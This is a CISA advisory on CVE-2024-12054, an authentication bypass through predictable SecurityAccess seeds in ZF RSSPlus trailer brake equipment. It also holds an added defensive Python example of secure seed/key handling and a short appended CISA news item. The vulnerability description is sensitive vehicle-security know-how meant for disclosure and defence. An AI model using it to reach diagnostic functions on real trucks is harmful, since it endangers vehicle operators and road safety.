1. EXECUTIVE SUMMARY

CVSS v4 5.9
ATTENTION: Exploitable from an adjacent network/low attack complexity
Vendor: ZF
Equipment: RSSPlus
Vulnerability: Authentication Bypass By Primary Weakness

2. RISK EVALUATION
Successful exploitation of this vulnerability could allow an unauthenticated attacker to remotely (proximal/adjacent with RF equipment) call diagnostic functions, which could impact both availability and integrity.
3. TECHNICAL DETAILS
3.1 AFFECTED PRODUCTS
The following versions of RSSPlus are affected:

RSSPlus 2M: build dates 01/08 through at least 01/23

3.2 VULNERABILITY OVERVIEW
3.2.1 AUTHENTICATION BYPASS BY PRIMARY WEAKNESS CWE-305
The affected product is vulnerable to an authentication bypass vulnerability targeting deterministic RSSPlus SecurityAccess service seeds, which may allow an attacker to remotely (proximal/adjacent with RF equipment or via pivot from J2497 telematics devices) call diagnostic functions intended for workshop or repair scenarios. This can impact system availability, potentially degrading performance or erasing software, however the vehicle remains in a safe vehicle state.
CVE-2024-12054 has been assigned to this vulnerability. A CVSS v3.1 base score of 5.4 has been calculated; the CVSS vector string is (AV:A/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:H).
A CVSS v4 score has also been calculated for CVE-2024-12054. A base score of 5.9 has been calculated; the CVSS vector string is (CVSS:4.0/AV:A/AC:H/AT:P/PR:N/UI:P/VC:N/VI:L/VA:H/SC:N/SI:N/SA:N).
3.3 BACKGROUND

CRITICAL INFRASTRUCTURE SECTORS: Transportation Systems
COUNTRIES/AREAS DEPLOYED: Worldwide
COMPANY HEADQUARTERS LOCATION: Germany

3.4 RESEARCHER
National Motor Freight Traffic Association, Inc. (NMFTA) researchers Ben Gardiner and Anne Zachos reported this vulnerability to CISA.
4. MITIGATIONS
To most effectively mitigate general vulnerabilities of the powerline communication, any trucks, trailers, and tractors utilizing J2497 technology should disable all features where possible, except for backwards-compatibility with LAMP ON detection only. Users acquiring new trailer equipment should migrate all diagnostics to newer trailer bus technology. Users acquiring new tractor equipment should remove support for reception of any J2497 message other than LAMP messages.
ZF recommends:

Moving away from security access and implementing the latest security feature authenticate (0x29)
Ensuring random numbers are generated from a cryptographically secure hardware true random number generator
Adopting modern standards/protocols for truck trailer communication
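The two cryptographic recommendations above describe one property the seed/key exchange must have: the seed an ECU hands out in a SecurityAccess (0x27) request must be fresh and unpredictable for every session, otherwise a key observed once can be presented again. The following is an added illustration written for this advisory, not ZF, NMFTA or CISA code. It models the ECU side of a 0x27 exchange with a CSPRNG-backed, single-use seed and a lockout after repeated wrong keys, and includes a self-check that measures how often a seed generator repeats itself across simulated sessions, which is the defect class described in section 3.2.1. The 4-byte seed length, the HMAC-based key derivation, the placeholder ECU secret and the `deterministic_rng` stand-in are all assumptions for illustration; the RSSPlus algorithm itself is not on the page.

```python
"""ECU-side UDS SecurityAccess (0x27) seed/key handling with an unpredictable,
single-use seed, plus a seed-quality self-check.

Added example for this advisory; not ZF, NMFTA or CISA code.  The seed
length, the HMAC key derivation and the ECU secret are assumptions."""
import hashlib
import hmac
import secrets
from dataclasses import dataclass
from typing import Callable, Optional

SEED_LEN = 4          # assumption: 4-byte seed and key, a common 0x27 layout
MAX_ATTEMPTS = 3      # lock the security level after this many wrong keys

# Placeholder ECU secret, constructed for this example only.
ECU_SECRET = bytes.fromhex("0f1e2d3c4b5a69788796a5b4c3d2e1f0")


def derive_key(seed: bytes, secret: bytes = ECU_SECRET) -> bytes:
    """Key = truncated HMAC-SHA256(secret, seed).

    A keyed MAC stops an observer of many seed/key pairs from reconstructing
    the mapping, but that only helps when the seed itself is fresh: with a
    deterministic seed the same key is valid in every session."""
    return hmac.new(secret, seed, hashlib.sha256).digest()[:SEED_LEN]


@dataclass
class SecurityAccessServer:
    """State of one diagnostic session's 0x27 security level."""
    rng: Callable[[int], bytes] = secrets.token_bytes  # CSPRNG by default
    pending_seed: Optional[bytes] = None
    unlocked: bool = False
    failures: int = 0
    locked: bool = False

    def request_seed(self) -> bytes:
        """0x27 'requestSeed': draw a fresh seed for this request only."""
        if self.locked:
            raise PermissionError("security level locked")
        # Any earlier pending seed is discarded, so a key computed for an old
        # seed is never accepted later.
        self.pending_seed = self.rng(SEED_LEN)
        return self.pending_seed

    def send_key(self, key: bytes) -> bool:
        """0x27 'sendKey': accept the key only for the outstanding seed."""
        if self.locked or self.pending_seed is None:
            return False
        expected = derive_key(self.pending_seed)
        self.pending_seed = None            # single use, success or failure
        if hmac.compare_digest(expected, key):
            self.unlocked = True
            self.failures = 0
            return True
        self.failures += 1
        if self.failures >= MAX_ATTEMPTS:
            self.locked = True
        return False


def seed_repeat_rate(rng: Callable[[int], bytes], sessions: int = 1000) -> float:
    """Self-check for the defect class in this advisory.

    Draws one seed per simulated session (as a tester collecting seeds across
    power cycles would) and returns the fraction that repeat an earlier seed.
    A generator that restarts from a constant, or has a short cycle, scores
    high; a 4-byte CSPRNG seed over 1000 sessions should score near zero."""
    seen: set = set()
    repeats = 0
    for _ in range(sessions):
        seed = rng(SEED_LEN)
        if seed in seen:
            repeats += 1
        seen.add(seed)
    return repeats / sessions


def deterministic_rng(n: int) -> bytes:
    """Constructed stand-in for the weak behaviour: a 'random' seed that
    restarts from the same value in every session."""
    return bytes(range(n))


if __name__ == "__main__":
    ecu = SecurityAccessServer()
    seed = ecu.request_seed()
    print("unlocked with matching key:", ecu.send_key(derive_key(seed)))
    print("repeat rate, deterministic:", seed_repeat_rate(deterministic_rng))
    print("repeat rate, CSPRNG:       ", seed_repeat_rate(secrets.token_bytes))
```

The self-check is the part worth carrying into an acceptance test: it needs no knowledge of the key algorithm, only the seeds an ECU emits across sessions, and a non-trivial repeat rate is a direct indicator of the weakness this advisory describes. ZF's first recommendation goes further than patching the seed source: the Authentication service (0x29) defined in the 2020 edition of ISO 14229-1 replaces the seed/key scheme altogether with a challenge-response or certificate-based exchange, so the seed quality problem does not arise in the same form.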

NMFTA has published detailed information about how to mitigate these issues in the following ways:

Install a LAMP ON firewall for each ECU
Use a LAMP detect circuit LAMP ON sender with each trailer
Change addresses dynamically on each tractor in response to detecting a transmitter on its current address
Install RF chokes on each trailer between chassis ground and wiring ground
Load with LAMP keyhole signal on each tractor
Flood with jamming signal on each tractor

Please visit NMFTA for additional details on these and other solutions.
CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability, such as:

Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet.
Locate control system networks and remote devices behind firewalls and isolate them from business networks.
When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize VPN is only as secure as the connected devices.

CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.
CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.
CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.
Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B–Targeted Cyber Intrusion Detection and Mitigation Strategies.
Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.
CISA also recommends users take the following measures to protect themselves from social engineering attacks:

Do not click web links or open attachments in unsolicited email messages.
Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams.
Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks.

No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time.
5. UPDATE HISTORY

January 21, 2025: Initial Publication


CISA and FBI Release Updated Guidance on Product Security Bad Practices

In partnership with the Federal Bureau of Investigation (FBI), CISA released an update to joint guidance Product Security Bad Practices in furtherance of CISA’s Secure by Design initiative. This updated guidance incorporates public comments CISA received in response to a Request for Information, adding additional bad practices, context regarding memory-safe languages, clarifying timelines for patching Known Exploited Vulnerabilities (KEVs), and other recommendations.
While this voluntary guidance is intended for software manufacturers who develop software products and services in support of critical infrastructure, all software manufacturers are strongly encouraged to avoid these product security bad practices.
CISA and FBI urge software manufacturers to reduce customer risk by prioritizing security throughout the product development process. For more information and resources, visit CISA’s Secure by Design webpage or learn how to take CISA’s Secure by Design Pledge.